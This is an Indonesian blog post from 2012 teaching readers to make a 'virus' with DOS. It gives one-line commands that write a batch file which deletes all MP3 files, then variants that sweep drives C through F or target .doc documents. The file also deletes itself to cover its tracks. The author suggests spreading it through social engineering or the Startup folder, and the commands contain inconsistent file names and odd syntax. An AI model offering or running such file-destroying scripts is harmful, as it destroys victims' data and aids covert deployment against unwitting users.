Ads 468x60px

Kamis, 15 Maret 2012

Membuat Virus dengan DOS

Sebenarnya saya tidak  bergitu tertarik membahas tema yang satu ini. Karena cenderung bersifat merusak. Jadinya, saya tidak  akan berpanjang lebar. Ada banyak cara untuk membuat virus,  salah satunya adalah Membuat Virus dengan DOS.
Saya hanya akan memberikan sebuah contoh sangat sederhana dalam pembuatan virus.  Efeknya akan menghapus file MP3 yang ada dalam komputer. Sebenarnya saya pernah melihat sebuah virus  penghapus MP3  yang dibuat menggunakan  Visual  Basic, tapi  kalau cuma mau menghapus sebuah file, rasanya tidak  perlu menggunakan banyak-banyak source code.
Bahkan dalam blog  ini Anda  bisa  membuat virus  sejenis hanya dengan satu baris  perintah pada DOS.  Tidak  cuma itu, Anda  juga bisa   mengkreasikannya  untuk melakukan  aksi   delete jenis   file lainnya, cuma dengan menggantikan ekstensi file. Anda  juga  bisa memodifikasi untuk menghapus  semua  file  MP3  dalam seluruh drive atau hanya dalam folder tertentu
Yang perlu  Anda  ketikkan dalam DOS adalah:

echo  for %%p in (C:\hack) do del *.mp3 %0 %%p:>virusdot.bat

Membuat Virus dengan DOSvirusdot
Maka  akan muncul seekor virus  yang bernama virus.dot dalam folder yang aktif.
Membuat Virus dengan DOS
File Target
 
Untuk   menjalankannya, saya  serahkan  kepada  Anda. Apakah mau  menggunakan  Social  Engineering,  dipasang  di  StartUp. Semua itu urusan Anda. Saya hanya mengajari cara membuatnya saja. Sebagai contoh, saya langsung mengaktifkan file virus virusdos.bat tersebut.
Perhatikan, sekarang virus  itu  telah bekerja dengan menghapus semua file MP3 yang ada di dalamnya. Termasuk virus  itu sendiri menghilangkan dirinya, untuk menghapus jejak.
File Target
File target dihapus
Maaf  ya,   saya cuma memberikan metode Membuat Virus dengan DOS  saja. Untuk   model- model  lainnya,  pelajari  sendiri.  Khan   saya sudah bilang   tidak begitu tertarik dengan bab  ini. metode Membuat Virus dengan DOS merupakan salah satu metode yang sering digunakan dan merupakan metode sederhana.
Sebagai sedikit bonus, apabila Anda  berniat memodifikasi supaya virus   tersebut  dapat  menghapus  dalam  semua  drive,   bentuk syntax-nya adalah:

echo  for %%p in (C D E F) do del *.mp3 %0 %%p:>virusdot.bat

Nanti,  virus  akan menyusup ke drive  C, D, E, dan  F untuk meng- hapus file MP3.
Sekarang   apabila  berniat  jenis    file   tertentu,  katakanlah  file dokumen (DOC), syntax-nya menjadi:

echo  for %%p in (C D E F) do del *.doc %0 %%p:>virusdot.bat

Yah,  pokoknya pintar-pintar Anda-lah. Saya agak malas main- main dengan virus apa lagi Membuat Virus dengan DOS.  Jadi, sudah segitu aja dulu ya.

0 komentar:

Posting Komentar

Blogroll